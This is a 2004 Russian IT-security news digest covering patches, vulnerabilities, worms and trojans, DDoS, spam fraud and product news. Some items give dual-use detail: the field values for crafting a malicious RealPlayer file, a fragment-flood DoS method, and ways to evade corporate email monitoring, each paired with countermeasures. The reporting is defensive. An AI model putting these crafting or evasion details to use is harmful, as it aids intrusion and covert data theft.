Закон "О средствах массовой информации" не должен рассматривать интернет-сайты, как средства массовой информации, считает замминистра информационных технологий и связи РФ Дмитрий Милованцев. Он сделал такое заявление на заседании комиссии Совета Федерации по информационной политике, сообщает РИА "Новости". На заседании рассматривались вопросы концепции нового закона "О СМИ", который находится в стадии доработки. "Личные сайты в Интернете можно сравнить, например, со школьной стенгазетой. Получается, и стенгазету стоит относить к СМИ?", - сказал Милованцев. Он также отметил, что практически во всех странах интернет не рассматривается, как средство массовой информации. По словам замминистра, если веб-сайты считать СМИ, то они "будут регистрироваться не за 20 долларов, как сейчас, а в 10 раз дороже, так как для их регистрации понадобиться лицензирование". В свою очередь, директор правого Департамента министерства культуры и массовых коммуникаций Юрий Голик отметил, что четкого понимания в вопросе, относить ли интернет к СМИ, пока нет. "В любом случае необходимо принимать новый закон, поскольку прежний был принят в 91 году, и с тех пор появились новые реалии", - отметил он.
Lenta.Ru

6/10/2004 16:51 Обновление для Mac OS X
Apple Computer Inc. выпущены патчи, устраняющие проблемы с безопасностью большого числа приложений как в клиентском, так и серверном вариантах. Патчи касаются, например таких сервисов, как система разделения файлов (file sharing), система печати, медиаплеер QuickTime etc. Также был выпущен датированный ещё сентябрём Security Update 2004-09-30, предназначенный для Mac OS X 2.8 (крайняя версия ОС - Mac OS X 10.3.5 - выпущена в августе). В патч-релизе, как указывает компания, устранены 8 уязвимостей, обнаруженных в ОС (среди них - уязвимости в AFP (Apple Filing Protocol) сервере, системе печати CUPS, уязвимость в обработке PNG-файлов, уязвимости приложений - NetInfo Manager, ServerAdmin, Postfix). Патчи доступны через сервис Software Update.
Страница загрузки

6/10/2004 16:43 Множество уязвимостей в IBM DB2
Исследователи из известной секьюрити компании NGSSoftware (Next Generation Security Software) сообщают о наличии по крайней мере 20 (!) уязвимостей в выпускаемой и поддерживаемой IBM CУБД - DB2. Все уязвимости характеризуются, как "критические" и связаны с переполнением буфера, в результате чего атакующим может быть выполнен код на удалённой машине. Как пишет NGSSoftware, в настоящий момент они не собираются раскрывать детали уязвимостей в течение 3-х месяцев (до 5 января 2005 г.), чтобы дать возможность администраторам пропатчить системы. Тем временем, ISM выпущены фикспаки - FixPaks 6a и 7a. Уязвимость присутствует в IBM DB2 Universal Database версии 8.0.0 и 8.1.0 для ОС: AIX, HP-UX, Solaris, Linux и Windows.
Источник

6/10/2004 15:06 PalmOne лицензировала Microsoft Exchange Server ActiveSync
Очень интересное и без преувеличения эпохальное событие: PalmOne подписала соглашение с Microsoft о лицензировании у последней программного обеспечения ActiveSync для обеспечения безопасного доступа мобильных устройств к корпоративной почте. Разумеется, пресса не преминула отпустить по этому поводу шпильку, мол, palmOne пошла на приобретение лицензии в пику Research In Motion (RIM), которая уже давно практикует поддержку защищенного режима обмена почтовой корреспонденцией в своих популярных смартфонах BlackBerry. Как выяснилось, PalmOne планирует использовать лицензированное у Microsoft ПО Exchange Server ActiveSync для поддержки в следующих версиях смартфонов-органайзеров Treo. Финансовая сторона сделки не разглашается.
Mobile-Review

6/10/2004 14:03 Хакеры из Нидерландов включились в политическую борьбу
В минувший вторник несколько сайтов правительства Нидерландов подверглись DoS-атаке и оказались недоступны для посетителей, сообщает Associated Press. Организаторы кибернападения назвали себя Hacking Crew 10pht и сообщили, что таким образом протестуют против правой политики властей страны. В частности, хакеров возмутило сокращение расходов на ранние пенсии и здравоохранение в 2005 году. Чтобы осудить действия министров, 2 октября на улицы Амстердама вышли несколько десятков тысяч человек. "Демонстрация не заинтересует правых. А наши действия заставят их очнуться", - так объяснил действия группировки один из хакеров.
Viruslist

6/10/2004 13:58 "Скорлупа" для Windows
Одним из компонентов новой версии Windows, Longhorn, возможно, станет платформа сценариев Microsoft Shell, известная под кодовым именем Monad. Она создается по просьбе системных администраторов и широтой возможностей будет напоминать Unix Shell. При помощи команд и сценариев Microsoft Shell можно будет останавливать индивидуальные процессы на компьютере, отправлять сообщения электронной почты, модифицировать реестр, получать список сетевых дисков совместного пользования и т. п. Для авторизованных пользователей возможен будет удаленный доступ к Microsoft Shell по telnet, HTTPS и другим протоколам Internet. По сообщению представителей Microsoft, на 2005 год запланирован выпуск бета-версии Shell, и окончательное решение о включении платформы в состав Longhorn пока не принято.
"Открытые системы"

6/10/2004 13:26 Интегрированное решение для всесторонней защиты SMTP-трафика
Всё та же "Лаборатория" сообщает о начале продаж полнофункциональной коммерческой версии первого программного продукта, сочетающего в себе функции антивирусной обработки почтового трафика, блокирования попыток несанкционированного доступа и защиту от нежелательной почтовой корреспонденции - Kaspersky® SMTP-Gateway 5.0 для Linux/Unix. Kaspersky SMTP-Gateway предназначен для антивирусной обработки проходящего через него SMTP-трафика. Помимо эффективной защиты от вредоносных программ, разработка 'Лаборатории Касперского' объединяет в себе набор таких важных для бесперебойной работы корпоративной IT-инфраструктуры функций, как маршрутизация почтового трафика и защита от хакерских атак. Антивирусный программный комплекс Kaspersky SMTP-Gateway реализует в соответствии с интернет-стандартами IETF RFC полноценный почтовый маршрутизатор, работающий под управлением операционных систем Linux, FreeBSD или OpenBSD. Интеграция в продукт передовых технологических решений 'Лаборатории Касперского' позволяет программе обеспечивать всестороннюю защиту почтового трафика.
О продукте

6/10/2004 12:47 Итоги вирусной активности за сентябрь
"Лаборатория Касперского" опубликовала вирусный "хит-парад" прошедшего месяца. Согласно этому отчёту, первые 2 места удерживают модификации червя NetSky, на первом месте - версия "q" - 21,67%, на втором - "aa" - 13,79% в общем количестве зафиксированных вирусных инцидентов. На третьем месте с 12,70% - червь I-Worm.Zafi.b. Несколько значительных эпидемий, вызванных появлением новых вариантов старых врагов - Bagle и MyDoom, стали самым заметным событием в вирусной статистике сентября 2004 года. Ожидавшаяся многими эпидемия почтового червя, использующего уязвимость в модуле обработки JPEG в OS Windows, к счастью, пока не состоялась, поэтому в целом картина сентября во многом схожа с августовской. 5 новых вредоносных программ в рейтинге - точное повторение результата августа. Отличия незначительны - в августе появилось три новых варианта MyDoom и ни одного Bagle, а в сентябре был установлен паритет - по два варианта в каждом семействе. Плюс в рейтинг стремительно ворвался TrojanDownloader.JS.Gen, многократно использовавшийся в нескольких спам-рассылках
Вирусная двадцатка

6/10/2004 11:37 В Запорожье задержали хакера, пытавшегося похитить со счетов миллион долларов
Сотрудники следственного отдела прокуратуры Запорожской области и Запорожского облуправления по борьбе с организованной преступностью задержали хакера, который, незаконно проникнув в компьютерную систему Запорожской областной дирекции АППБ «Аваль», пытался похитить со счета Запорожской таможни, открытого в этом банке, около 5 млн. грн. По словам начальника следственного отдела прокуратуры Запорожской области Александра Кошмана, «злоумышленник незаконно проник в систему программного обеспечения электронной системы платежей и создал поддельное платежное поручение, согласно которому 4 млн. 914 тыс. 438 грн. должны были быть перечислены со счета Запорожской таможни в банк на счет частной фирмы в одном из банков Днепропетровска», передает «УНИАН». Работники Запорожской дирекции банка деньги перевели, однако воспользоваться ими хакер не успел: в день платежа было установлено, что платежное поручение – подделка и средства Запорожской таможни были возвращены на ее счет. Сейчас хакер находится под стражей. Возбуждено уголовное дело по ч. 2 ст. 15, ч.5 ст. 185 и ч.1 ст. 361 Уголовного кодекса Украины – «Покушение на кражу в особо крупных размерах путем вмешательства в работу электронно-вычислительных систем и компьютерных сетей». Злоумышленнику грозит наказание в виде лишения свободы на срок до 12 лет с конфискацией имущества.
Crime-research.ru

6/10/2004 11:19 Sun Microsystems объявляет о новом поколении своих процессоров
5 Октября Sun Microsystems объявила о новом поколении своих процессоров - UltraSPARC IV+, которое будет призвано заменить UltraSPARC IV, сообщает linux.org.ru. Sun начнёт установку нового процессора в свои сервера уже в следующем году. UltraSPARC IV+ будет иметь тактовые частоты от 1.8Ghz и выше, иметь 2MB L2 кэш а также огромный 32MB L3 кэш, и изготовляться по 90 нм технологии. Ожидается двойной прирост производительности по сравнению с UltraSPARC IV.
Пресс-релиз

6/10/2004 10:57 Палата представителей одобрила закон против spyware
Палата представителей Конгресса США проголосовала за ограничение некоторых наиболее одиозных форм шпионского ПО. 399 голосами против 1 члены Палаты поддержали законопроект, запрещающий «перехватывать управление» компьютером, скрыто модифицировать домашнюю страницу веб-браузера или без разрешения блокировать работу антивирусного ПО. Принятие Spy Act ведет также к созданию сложного набора правил, регламентирующих программное обеспечение, способное передавать информацию через интернет. Этот законопроект предоставляет Федеральной торговой комиссии право следить за нарушениями закона и в наиболее серьезных случаях налагать штрафы до $3 млн. «Быстрое размножение spyware стало общей бедой пользователей компьютеров, — сказала конгрессмен Мэри Боно, одна из архитекторов этой меры. — Сегодняшнее принятие Spy Act стало победой потребителей: они на один шаг приблизились к овладению контролем над собственными ПК». В процессе прений конгрессмен Ян Шаковски заявил, что компьютеры американцев «больше им не принадлежат, и они не могут понять, почему». Некоторые организации возражали против более ранней редакции Spy Act, утверждая, что хотя они осуждают spyware, закон сформулирован настолько широко, что его можно применять и против легитимного программного обеспечения. В понедельник комитет по энергетике и торговле отреагировал на эту критику и перед голосованием внес в формулировки закона мелкие изменения. Аналогичный законопроект рассматривается в Сенате. 21 сентября Торговая палата США направила влиятельным сенаторам письмо, в котором говорится, что их проект «слишком широк» и может «задушить электронную коммерцию и наложить на легальный бизнес слишком высокие обязательства».
ZDNet

6/10/2004 10:23 Электронные мошенники греют руки на предвыборной кампании в США
Новый вид мошенничества в интернете появился в связи с предвыборной кампанией в США. Как сообщает BBC News, по электронной почте рассылаются сообщения, получателям которых предлагается высказаться в поддержку одного из кандидатов в президенты. Для этого необходимо позвонить по телефону, начинающемуся с кода 900 и проголосовать за Буша или за Керри. Хитрость заключается в том, что телефонный звонок стоит 1,99 доллара. По оценке одной из фирм, занимающейся борьбой со спамом, ежедневно рассылается почти четверть миллиона таких посланий. Они составлены так, чтобы у получившего их человека не возникло сомнений в их подлинности. Кроме того, авторы сообщения указывают, что их деятельность одобрена предвыборными штабами обоих кандидатов, в которые и будут направлены результаты опроса. Спам замаскирован под рассылку с известного британского интернет-портала lycos.com, но на самом деле его источником является один из серверов, физически расположенных на территории Чехии. По британским законам рассылка несанкционированных электронных писем на частные почтовые адреса является преступлением, но в США выбор, открывать или не открывать подобные сообщения, оставлен за их получателем.
Подробности

5/10/2004 13:01 Уязвимость в FreeBSD
Команда разработчиков FreeBSD выпустила бюллетень по безопасности FreeBSD-SA-04:15.syscons, в котором описано существование локальной уязвимости в syscons(4) - консольном драйвере этой ОС. Этот драйвер обеспечивает доступ к виртуальным терминалам (перебираются Alt+FN). В функции CONS_SCRSHOT ioctl(2) обнаружена ошибка разбора входных данных, в результате которой (задав отрицательное или очень большое значение текущих координат) можно привести систему в нестабильное состояние. В результате можно получить доступ к важной системной информации ядра (в том числе, в некоторых случаях, прочесть введённые пароли), а также к повышению локальных полномочий. Также указыается, что использовать уязвимость может только пользователь, получивший физический доступ к локальной консоли (к файлам /dev/tty*). Уязвимость обнаружена в версиях FreeBSD 5.x - RELEASE, RELENG и BETA-версиях. Патч выпущен.
Подробности

5/10/2004 12:45 Rose Fragmentation Attack в Widnows XP/2000
Несколько вариантов некоторых известных уязвимостей в Windows могут эксплуатироваться удаленным пользователем, чтобы вызвать отказ в обслуживании, сообщает SecurityLab.Ru. Ошибка обнаружена в обработке фрагментированных пакетов. Удаленный пользователь может послать большое число небольших фрагментированных пакетов, в которых пропущены некоторые пакеты и затем постоянно посылать последний фрагмент, чтобы заставить уязвимую систему использовать 100 CPU и перестать обрабатывать легитимные фрагментированные пакеты.
Пример эксплоита

5/10/2004 12:27 Современные мобильники – хрустальная мечта хакера
Взломать встроенную защиту мобильного телефона последнего поколения проще, чем отобрать конфету у ребенка. Для хакеров с характером, разумеется. Как утверждают некоторые эксперты по компьютерной безопасности, отметившиеся на конференции Hack in the Box, проходящей в эти дни в столице Малайзии Куала-Лумпуре, в современных мобильных телефонах достаточно дыр для того, чтобы любой более-менее разбирающийся в вопросе хакер мог без особого труда полистать на расстоянии записную книжку владельца аппарата или даже послушать, о чем тот разговаривает по телефону. Об этом пишет BBC News. Для того чтобы не быть голословными, делегаты конференции собираются, в частности, продемонстрировать технику использования дыр в движке Java 2 Micro Edition (тот самый J2ME, встречающаяся почти во всех мобильниках и во многих наладонниках), разработанном совместными усилиями Sun, Nokia, Sony Ericsson и Motorola. Докладчики, разумеется, не открывают широкой общественности всю подноготную своей техники, однако намекают, что механизм эксплуатации связан с тем, каким образом Java пытается запретить операционной системе принимать некоторые внешние команды.
Internet.Ru

5/10/2004 11:39 Первый публичный релиз http-сервера nginx 0.1.0
После трех лет разработки, Игорь Сысоев анонсировал выход первой, публично доступной, версии, одного из лучших по соотношению производительность/функциональность http-серверов - nginx 0.1.0, сообщает opennet.ru. Кратко, основные достоинства:
- изменение настроек и обновление исполняемого файла без перерыва в обслуживании клиентов;
- гибкость конфигурации на уровне Apache, настройка таймаутов и размеров буферов;
- проксирование без кэширования;
- поддержка keep-alive и pipelined соединений;
- виртуальные сервера, определяемые по ip-адресу и имени;
- изменение URI с помощью регулярных выражений;
- модульность, фильтры, в том числе сжатие (gzip), byte-ranges (докачка), chunked ответы;
- поддержка kqueue (FreeBSD 4.1+), epoll (Linux 2.6+), rt signals (Linux 2.4), /dev/poll (Solaris 8+), select и poll;
- поддержка sendfile (FreeBSD 3.1+), sendfile (Linux 2.2), sendfile64 (Linux 2.4+) и sendfilev (Solaris 8+);
- экспериментальная поддержка SSL;
- экспериментальное ограничение скорости отдачи статических ответов;
Сайт проекта

5/10/2004 11:17 Протокол Jabber опубликован как RFC
IETF официально закончила очередной этап по стандартизации Extensible Messaging and Presence Protocol и выпустила RFC за номерами 3920, 3921, 3922 и 3923. Таким образом, Jabber становится "официальным" протоколом Internet.
Пресс-релиз

5/10/2004 11:05 Xamlon намерена обогнать Microsoft
Программист и предприниматель Пол Колтон считает, что сможет обойти Microsoft, вырвав страницу из ее рабочей книги — в буквальном смысле. В понедельник компания Колтона Xamlon выпустила первый продукт — комплект инструментов разработки, предназначенный для ускорения процесса создания ПО пользовательского интерфейса для веб-приложений. Xamlon построила программу на основе опубликованных технических спецификаций программного обеспечения разработки пользовательского интерфейса Microsoft, которое сама Microsoft планирует выпустить не раньше 2006 года. Колтон, СЕО Xamlon, пришел к идее основать собственную фирму в ноябре прошлого года после конференции профессиональных разработчиков Microsoft, на которой Microsoft представила массу технической информации о будущей версии Windows Longhorn и сопутствующих технологий разработки ПО. Воспользовавшись опубликованными материалами по Avalon (это общее название для ПО пользовательского интерфейса Microsoft, которое должно выйти вместе с Longhorn через два года), Колтон решил уже сейчас выпустить то, над чем Microsoft намерена работать несколько лет. «Это та часть Avalon, в которой люди нуждаются уже сегодня, — говорит Колтон. — Облегченный клон Avalon». Своим Avalon Microsoft намерена существенно упростить процесс создания интерфейсной части веб-приложений. Софтверный гигант предложил язык eXtensible Application Markup Language (XAML), позволяющий разработчикам проектировать веб-страницы с применением тегов, а не программного кода. Опираясь на доступную информацию по XAML, Xamlon смогла создать инструменты, генерирующие XAML. С помощью XAML разработчики смогут исключить около 75% кода и повысить производительность Windows-приложений на базе Web, а также облегчить модификацию приложений после их написания, утверждает Xamlon.
Подробнее

5/10/2004 10:47 Распродажа доменов .info по 5 долларов
С 5-го октября на портале Webnames.ru можно зарегистрировать домен в зоне .info на 1 год всего за 5 долларов при обычной цене 15 долларов, а при регистрации более чем на 1 год — первый год регистрации будет предоставляться бесплатно, сообщает всё та же "Вебпланета". Это стало возможным благодаря проводимой компанией Afilias акции по дальнейшему расширению зоны .info, в которой участвуют некоторые регистраторы и их партнеры, в том числе и ООО «Регтайм». В рамках этой акции, которая продлится до конца текущего года, один владелец может зарегистрировать на льготных условиях не более 25 доменов .info. Для удобства пользователей На Webnames.ru опубликован список из 4000 «хороших» доменов в зоне .info свободных для регистрации.
Подробности

5/10/2004 10:23 Бред юзера или явь сисадмина?
Вышла книга «Бред юзера или явь сисадмина» — собрание материалов сайта Sysadmin.mail.ru, cообщает "Вебпланета". Книга «Бред юзера или явь сисадмина» представляет собой сборник лучших материалов сайта «Сисадмин тоже человек» и является одним из первых осуществленных проектов выхода интернет-сайта на книжные страницы. Книга «Бред юзера или явь сисадмина» является сборником избранных жалоб, высказываний и историй системных администраторов, присланных на конкурс «Сисадмин тоже человек». Конкурс проводился в преддверии Международного дня системного администратора компаниями SoftLine и Mail.Ru на сайте Soft@Mail.Ru. С завершением конкурса проект «Сисадмин тоже человек» продолжает жить и здравствовать, радуя интернет-сообщество новыми перлами представителей этой удивительной профессии, чье название вы не найдете ни в одном реестре специальностей. Тираж книги «Бред юзера или явь сисадмина» составил 800 экземпляров. Книга издана компанией SoftLine и представляет собой пилотный проект. Кроме того, на обложке книги красуется знаменательная надпись: том первый. Книгу нельзя купить, но можно получить в подарок. Подробнее об написано на страницах сайта «Сисадмин тоже человек».
Условия получения

5/10/2004 10:02 Червь Bagz отключает брандмауэр
Специалисты компании Sophos обнаружили в интернете новую вредоносную программу Bagz. Этот червь распространяется по электронной почте под видом ZIP-архивов или исполняемых файлов с двойным расширением DOC.EXE, например, message.doc.exe. После запуска пользователем компьютера вирус записывает в системную директорию Windows несколько файлов и вносит изменения в реестр с целью обеспечения собственного автозапуска. Кроме того, червь пытается отключить установленный по умолчанию брандмауэр. В процессе организации массовых рассылок Bagz применяет встроенный SMTP-сервер.
Описание

5/10/2004 09:35 Северная Корея подготовила целый полк хакеров
За последние годы Пхеньян подготовил не менее пятисот хакеров для ведения электронной войны против южного соседа, Японии и США. Об этом сообщает Financial Times. Как сообщил министр обороны Южной Кореи, выступивший в понедельник перед Национальным собранием, "способность Северной Кореи вести войну достигла уровня развитых стран." По его словам, Пхеньян ежегодно получает более ста специалистов, проходящих пятилетнюю подготовку в военной академии имени Ким Ир Сена. Они обучаются сбору секретной информации, проведению компьютерных атак, и могут серьезно навредить безопасности Южной Кореи. Более того, северный сосед заметно активизировал свою деятельность в Интернете, запустив шесть сайтов, восхваляющих политический режим КНДР. В этом году почти триста южнокорейских правительственных компьютеров, включая сеть Национального собрания и научно-исследовательского института атомной энергии, подверглись хакерской атаке и были заражены вирусами, крадущими пароли и другую секретную информацию. По данным южнокорейской разведки, атаки по большей части были проведены из Китая, хотя точно не определено, находились ли злоумышленники непосредственно на территории соседней страны, или просто использовали китайские сети. Южнокорейские представители полагают, что следует в срочном порядке объедить усилия всех ведомств и озаботиться повышением компьютерной безопасности государства.
Lenta.Ru

4/10/2004 20:12 Троян Rtkit открывает "черный ход" в систему
Компания Symantec предупреждает о появлении новой вредоносной программы Rtkit. После проникновения на компьютер и активации этот троян создает в системной директории Windows четыре файла с именами ntrootkit.exe, globalc.dll, npf.sys, rtkit.log и вносит ряд дополнительных записей в реестр. Далее троян открывает "черный ход" в систему, через который злоумышленники могут выполнять на инфицированном компьютере произвольные действия, в том числе просматривать конфиденциальную информацию, загружать какие-либо файлы и осуществлять DoS-атаки. Широкого распространения вредоносная программа пока не получила.
Описание

4/10/2004 18:48 PalmSource выпускает Palm OS Developer Suite 1.0
PalmSource объявила о выпуске пакета Palm OS Developer Suite 1.0, созданного для разработки мультимедийных и беспроводых приложений для карманных компьютеров на базе процессоров ARM и 68K. Palm OS Developer Suite 1.0 бесплатно распространяется среди всех зарегистрированных пользователей на PalmSource, cообщает "Компьюлента". Система содержит в себе интегрированную среду разработки (IDE), основанную на движке Eclipse √ программном продукте IBM с открытым исходным кодом. Выход Palm OS Developer Suite 1.0 дает возможность разработчикам создавать приложения для мобильных устройств на базе процессоров ARM для смартфонов и устройств с Palm OS Cobalt. Создатели вновь использовали Metrowerks CodeWarrior, среду разработки программ под Palm OS. Основными особенностями новой версии Palm OS Developer Suite являются: поддержка интерфейсов Palm OS Protein (x86 и ARM), 68K, и PACE Native Objects; использование Eclipse IDE, версии 2.1.2 и Eclipse C/C++ Developer Tools, версии 1.2.1; управление проектом Managed Make избавляет разработчика от необходимости вручную редактировать файлы проекта; встроенная поддержка отладки на Palm OS Simulators, Palm OS Emulator (POSE) и на большинстве устройств с последовательным или USB-портом; отдельный редактор ресурсов Palm OS Resource Editor с поддержкой формата XRD.

4/10/2004 10:54 Уязвимость в в Microsoft SQL Server
В распространённой и довольно популярной СУБД Microsoft SQL Server обнаружена очередная уязвимость. Как сообщает Secunia, наличие уязвимости обеспечивает возможность проведения удалённой DoS-атак. Злоумышленник может послать сформированный специальным образом запрос размером более 700000 байт, обработка которого приведет к аварийному закрытию приложения. Правда, атака может быть организована только из локальной подсети, в связи с чем уязвимость была охарактеризована как малоопасная. Брешь содержится в базе данных Microsoft SQL Server 7.0 Service Pack 3 и более ранних версиях. Способов устранения проблемы пока не существует.
Описание

4/10/2004 10:33 Инструменты программирования Intel для новых 64-разрядных чипов
Intel сделала важный шаг по реализации преимуществ нового поколения процессоров, выпустив инструменты программирования, позволяющие разработчикам создавать ПО для 64-разрядных чипов х86. В понедельник компания планирует анонсировать новую версию своего компилятора, важного инструмента, который преобразует ПО, написанное программистами, в инструкции, воспринимаемые компьютером. В этом году Intel начала продавать процессоры Xeon и Pentium 4 с 64-битным расширением набора команд EM64T, которое позволяет им легко использовать память емкостью свыше 4 Гбайт. 64-разрядные чипы Intel появились больше чем через год после того, как конкурент Advanced Micro Devices предложил в своих продуктах Opteron и Athlon 64 собственную версию реализации этой идеи, AMD64. Компиляторы создают код для чипов как от Intel, так и от AMD, сказал директор по маркетингу отделения программных продуктов Intel Джеймс Рейндерс. «Нашим заказчикам нужна возможность создавать код, который хорошо работал бы на их машинах. Какой-то процент этих машин может быть не-Intel машинами. Наш код работает по крайней мере не хуже любого другого компилятора для процессоров AMD». Компиляторы Intel выйдут для Linux, которая уже существует в 64-битных версиях от Red Hat и Novell, и для Windows, которая будет поддерживать 64-разрядные чипы х86 не ранее 2005 года. В число заказчиков инструментов программирования Intel входят IBM и Oracle, которые строят с их помощью свои СУБД. И даже несмотря на то, что программисты open-source в подавляющем большинстве предпочитают компилятор GCC (который сам является проектом open-source), их используют разработчики Red Flag Linux и базы данных MySQL.
Подробности

4/10/2004 09:51 Мониторинг электронной почты
Принципиально слежение за электронной почтой мало отличается от слежения и записи телефонных переговоров. За исключением того, что e-mail удобнее для «шпиона». Проще отправить письмо с присоединенным к нему файлом, чем зачитывать объемный секретный документ по телефону, под удивленные взгляды коллег. Да и кажется это более безопасным для «шпиона», ведь телефонные переговоры очень часто пишутся, а вот средств перехвата электронной почты не так много и они не столь распространены. Информационная защита организации не может быть полной, если неконтролируемым остается такой удобный и популярный канал передачи информации, как электронная почта. Меры противодействия могут быть использованы как злоумышленниками, при пересылке конфиденциальной информации, так и сотрудниками отдела ИТ компании, чтобы сама почта компании не оказалась прочитана третьими лицами.
• Отсылка письма в обход средств мониторинга.
Самый простой способ, который может быть использован «шпионом». Каждый почтовый клиент позволяет выбрать адрес почтового сервера. В большинстве случаев, там будет указан корпоративный почтовый сервер. Если указать там адрес другого сервера, который может принять письмо, то оно не пройдет через корпоративный сервер. Если используются средства мониторинга, интегрированные в почтовый сервер, то они не смогут заметить это письмо.
Контрмеры: запрет обращения к внешним SMTP серверам на межсетевом экране (TCP/25), использование средств пассивного мониторинга.
• Шифрование письма.
Например, с помощью PGP. Даже если письмо и будет перехвачено, его содержимое (кроме поля Subject) будет в зашифрованном виде и не сможет быть прочитано.
Контрмера: В соответствии с RFC 2015, части письма, зашифрованные PGP будут помечены как "application/pgp-encrypted". Имеет смысл административно запретить несанкционированную шифрованную переписку, настроить фильтр на сохранение писем, содержащих эту строку и расследовать (с привлечением отправителя письма) каждый факт нарушения.
• Шифрование трафика.
Использование VPN (например, FreeS/WAN, реализующий стандарт IPSec) позволяет шифровать весь трафик между гейтвеями VPN (например, между филиалами одной компании). Из шифрованного трафика невозможно выделить почтовый трафик и расшифровать его.
Подробнее

3/10/2004 18:24 Уязвимость в Firefox
Mozilla Foundation сообщает о достаточно серьёзной уязвимости в выпускаемом компании браузере Firefox. Уязвимость позволяет удалённому злоумышленнику, убедившего посетителя загрузить специальный файл с Вэб-сервера, удалить всё содержимое в директории загрузки (обычно задаётся в настройках Firefox, либо запрашивается у пользователя при загрузке). В качестве рекомендации предлагается загрузить превью релиз - Firefox 0.10.1, либо загрузить специальный патч.
Подробности

3/10/2004 17:20 У HOTBOX.ru появился сертификат
На днях обновился почтовый сервис hotbox.ru. Теперь его основным доменным именем стало pochta.ru. Как шаг в положительном направлении хочется отметить, что у данного почтового сервиса наконец-то появился сертификат SSL-соединения, заверенный Thawte Consulting. Т.е. теперь почтовый клиент не ругается при установлении защищённого соединения. Разумеется, надо указывать в настройках почтовой программы, в качестве почтового сервера его обновлённое доменное имя. Это не мешает пользоваться почтовыми адресами, зарегистрированными на альтернативных доменных именах данного сервиса. Однако ранее самопровозглашённый сертификат hotbox содержал 1024-битный ключ криптоалгоритма RSA. В настоящее время, заверенный Thawte сертификат содержит всего лишь 512-битный ключ. Это удивительным образом перекликается с анонсированным более полугода назад выходом чипа для взлома 512-битных ключей RSA. Впрочем, хозяевам секретной части ключа - сервиса hotbox.ru/pochta.ru (читай ФСБ) - совершенно не обязательно взламывать код, когда его можно просто расшифровать. Поэтому для практических целей по-прежнему представляется выгодным пользоваться зарубежными бесплатными защищёнными почтовыми сервисами. Например https://freemail.web.de. Что же касается защиты от снифинга со стороны администратора локальной сети или интернет-провайдера - то, как уже говорилось выше, появление заверенного по всем правилам сертификата - это значительный шаг вперёд. Теперь злоумышленники не смогут использовать для подмены сертификата защищённого соединения и осуществления MIM-атаки распространённое программное обеспечение. Что же касается использования со стороны злоумышленников вышеуказанного чипа, - то в настоящий момент это находится выше финансовых возможностей подавляющего большинства любителей. (Порядка 1-10 Млн. $(?)). Автор новости - dimm_pc66_100@mail.ru.
UINC

3/10/2004 12:11 Описание уязвимости в RealPlayer
eEye Digital Security опубликовано подробное описание уязвимоти, обнаруженной в семействе плееров RealPlayer. Уязвимость присутствует в бибилиотеке pnen3260.dll, отвечающей за обработку перключений между .rm-файлами. Сформировав специальный .rm-файл, который вместе со SMIL-файлом может вызвать перезапись памяти кучи, злоумышленник может выполнить произвольный код в конексте пользователя, от имени которого был запущен плеер. Для формирования подобного файла необходимо задать поле длины 0xFFFFFFF8 - 0xFFFFFFFF. Список уязвимых версий плееров приводится. Как мы указывали ранее, обновление на сайте производителя уже выпущено.
Описание

3/10/2004 11:26 DDoS-атака как средство подавления конкурента
Без своего сайта в Интернете не обходится сейчас практически ни одна организация. С его помощью менеджеры стараются привлечь новых клиентов, развивают новые системы оплаты и доставки товаров или услуг. Многие построили свой бизнес полностью в Интернете: сетевые форумы для общения, магазины, информационные агентства, газеты. По мнению киберпреступников, самое лучшее средство борьбы с виртуальными конкурентами, которое действует независимо от «жертвы», – DDoS-атака. Суть ее состоит в том, что хакер заставляет большое количество компьютерных систем слать бесконечные «мусорные» запросы одному или нескольким серверам, вызывая их перегрузку. Для этого хакер внедряет «безобидные» вирусы в обычные компьютеры. Эти программы не выполняют никаких функций до определенного, заданного заранее момента времени. После этого хакер активирует несколько тысяч вирусов, заставляя компьютеры обычных пользователей постоянно слать бессмысленные пакеты данных по одному и тому же адресу. Блокировка – далеко не единственный ущерб от DDoS-атаки. Организация, чей информационный ресурс постоянно недоступен, постепенно теряет свою репутацию. Посетители уходят к конкурентам. Существование сайта в этом случае теряет всякий смысл. Так, 16 января 2004 года после продолжительной DDoS-атаки интернет-казино «Триада» было вынуждено перенести свой сайт на новый хостинг. При этом правила работы на сайте сильно изменились. 18 февраля 2004 года, по сообщению пресс-службы компании «Мастерхост», началась распределенная Ddos-атака на серверы хостинг-провайдера. Паразитный трафик мешал нормальному соединению с рядом ресурсов, расположенных на технической площадке фирмы.
Подробности

3/10/2004 11:12 SNAP/PE, бесплатный видео-драйвер от SciTech Software
SciTech Software, известный производитель универсальных видео драйверов, уже некоторое время предлагает к использованию бесплатную версию драйвера SNAP Personal Edition своей последней разработки - универсального драйвера SNAP (потомка SDD - SciTech Display Doctor), сообщает linux.org.ru. От Enterprise Edition персональная версия отличается только лицензией и поддержкой единственного видео-чипсета на выбор пользователя. Наряду с Linux, поддерживаются также операционные системы Windows и OS/2. Для получения драйвера необходимо пройти бесплатную регистрацию на сайте, указать операционную систему, выбрать требуемый видео-чипсет и нажать кнопку [Generate]. В течении нескольких секунд драйвер будет сгенерирован и доступен для скачивания. Позже по желанию выбор ОС/чипсета можно сменить и сгенерировать новый драйвер. Единственное ограничение на генерацию драйверов - до 5 штук в неделю.
Подробности

3/10/2004 11:04 Лекарство от «слэшдот»-эффекта
Как известно, мелкие сайты могут не выдержать мощного наплыва посетителей, который возникает при «слэшдот»-эффекте. Авторы проекта Mirrordot дают таким сайтам шанс: система копирует сайт целиком и принимает удар на себя. Так называемый «слэшдот»-эффект — это один из специфических феноменов интернета, связанный с мощным всплеском посещаемости рядового веб-сайта после того, как ссылка на этот ресурс появлялась на ленте новостей популярного сетевого издания или блога. Термин, да и само явление возникли благодаря популярному информационному технологическому блогу Slashdot. Для «слэшдот»-эффекта характерно, что гигантский наплыв трафика нарастает стремительно, как снежный ком, фактически превращаясь в DoS-атаку, так что несчастный сайт, который никогда не испытывал такого наплыва посетителей, очень быстро становится недоступным или доступ к нему затрудняется из-за перегруженности сервера или недостаточной пропускной способности каналов связи. Новый проект Mirrordot создан с целью помочь маленьким сайтам, которые не могут выдержать «слэшдот»-эффект. Для этого система автоматически копирует содержание всех сайтов, ссылки на которые появляются на первой странице Slashdot. «Толстый» канал для быстрого копирования и хостинг для контента предоставляет крупный интернет-провайдер Deru Internet. Как и система кэширования Google, здесь каждая страница помещается во фрейм, чтобы показать, что это сохраненная копия. Через два дня сайт удаляется из кэша. Разработчиками системы являются специалисты из фирмы Edgeos, занимающейся компьютерной безопасностью. Они постоянно читают Slashdot и, как говорят в интервью Wired, сами постоянно страдают от «слэшдот»-эффекта.
Подробности

